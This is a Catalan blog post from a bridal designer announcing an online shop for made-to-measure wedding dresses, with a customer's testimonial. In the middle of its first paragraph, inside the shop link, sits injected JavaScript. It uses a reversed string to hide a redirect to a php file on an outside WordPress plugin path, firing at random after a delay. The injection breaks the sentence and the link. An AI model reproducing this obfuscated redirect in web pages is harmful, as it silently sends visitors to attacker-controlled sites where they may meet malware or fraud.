Estrenem botiga online!

Posted on by on May 4th, 2014 | 0 Comments »

Lluïsa Vilà, dissenyadora nupcial de vestits únics i vibrants, s’adapta al món i a les necessitats actuals. Per això, estrenem un nou projecte: una Botiga On line! A partir d’ara, tenim una nova secció a $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andes/">www.lluisavila.com on hi podràs trobar totes les col·leccions i complements per fer el teu vestit a mida, com tu desitges. Indicant-nos totes les teves mides, podràs tenir el teu vestit de núvia sense desplaçar-te de casa teva!

mides online

A banda de la comoditat per a tu, evitant els desplaçaments de les proves del vestit, amb la botiga on line tindràs també l'avantatge de tenir un millor preu que al taller i botiga convencional. Vestits, jaquetes, tuls, toies, sabates, accessoris pel cabell... ho trobaràs tot!

I és que moltes núvies ja ens havien demanat que poguessim vendre els nostres vestits d'aquesta manera per poder arribar a més núvies que cerquen vestitst diferents per al seu dia!  Tan és així, que ja fa uns mesos,  la Davínia d'Almería, ens va comprar un vestit, model Olympia sense provar-se'l, i va ser tot un èxit!

foto almeria novia

Aquí us en deixem el seu testimoni: "Me casé en Almería en Noviembre, y fue una boda preciosa con un vestido muy original que nadie había visto. Llevaba el Olympia que es perfecto para este calor. Me tomé las medidas con una modista, y me compré el vestido sin probármelo ¡qué nervios! Luego le metí un poco a los tirantes y me quedó como un guante. Sale mucho mucho más barato que en una tienda".  Moltes gràcies Davinia!

Lluïsa Vilà, continua amb noves idees que, a poc a poc, us anirem explicant!

« Comencem campanya a la Televisió!
Com portaràs el cabell el dia del casament? Et donem unes idees! »

No Comments


*